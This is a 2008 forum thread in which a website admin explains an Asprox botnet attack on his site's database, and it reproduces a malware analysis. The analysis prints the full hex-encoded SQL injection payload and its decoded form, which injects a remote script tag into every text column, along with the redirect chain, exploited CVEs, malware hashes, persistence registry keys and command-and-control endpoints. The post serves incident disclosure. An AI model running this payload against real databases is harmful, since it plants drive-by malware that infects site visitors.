Topic ClosedWebsite Upgrade / Security Fixes

 Post Reply Post Reply
Author
Mr. Bandnut View Drop Down
Admin Group
Admin Group
Avatar


Joined: Dec 24 2000
Points: 689
Direct Link To This Post Topic: Website Upgrade / Security Fixes
    Posted: May 20 2008 at 8:37am

Sorry for any issues you may have had with this web site in the last few days. I have been battling an automated bot trying to hack the BandNut database.  It was injecting malicious javascript code into the database tables, requiring me to restore the database from a backup, yes some data was lost so you may need to re-add a post or an event or two.

I spent a few days last week upgrading the forums in the hopes it would be more secure. But later found out it the SQL injection was getting through on pages I had created. So for 10 hours on Sunday I read through each page of code on BandNut and tightened the security for each page where needed. I do feel now that this site is safe from this and similar attacks.

The code that was inserted into the site executed some javascript from another site when anyone visited BandNut. My personal computer was not infected by this, but I keep my software up-to-date and run regular scans.

If you visited BandNut during May13th - May18th I would recommend checking your computer for spyware, run a anti-virus scan, and ensure your web browser is up-to-date. All of which you should do regularly anyway. It would probably be a good idea to also upgrade any media players or other software that connects to the web.

After a bit of searching it looks like over 30,000 web sites have been hit with this!!

Here is the low down on the attack if you want the technical side:

Fast-Fluxing SQL injection attacks executed from the Asprox botnet


SQL Injection Attack:


DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461655F437572736F72 AS
VARCHAR(4000));EXEC(@S);--


Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''script src=http: //www[dot]banner82[dot]com/b.js script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Tae_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample during analysis revealed:

24.126.130.229
67.167.252.180
69.247.201.61
71.81.34.118
74.129.121.181
75.118.8.92
78.92.76.30
89.170.16.252
99.151.145.10
99.254.31.140

Banner82.com Site
The b.js file may redirect to malicious code at a variety of locations. A sample analysis revealed the following.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is script a redirect to http: //66[dot]199[dot]242.[dot].26 /cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit generated exploit code targeted at the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index"

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connection to retrieve common.bin (spam instructions) and cmdexe.bin (SQL injection tool msscntr32.exe)

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP)
* Connects to \"www.yahoo.com\" on port 80 (IP)
* Connects to \"www.web.de\" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking"


 

  

Edited by Mr. Bandnut - May 20 2008 at 8:38am
Back to Top
Sponsored Links


Back to Top
ChowderMonkey View Drop Down
Band Member
Band Member
Avatar


Joined: Jan 29 2006
Band: Chowder Monkey
Points: 1268
Direct Link To This Post Posted: May 21 2008 at 5:39am
Glad you got it all worked out man. Being a fellow webmaster, I'm feeling your pain. Nothing like a ferked up database to wreck a week or so of your life!
Baby, it's not the 2.5 inches... It's the 200 pounds behind it.
Back to Top

 Post Reply Post Reply
  Share Topic   

Forum Jump Forum Permissions View Drop Down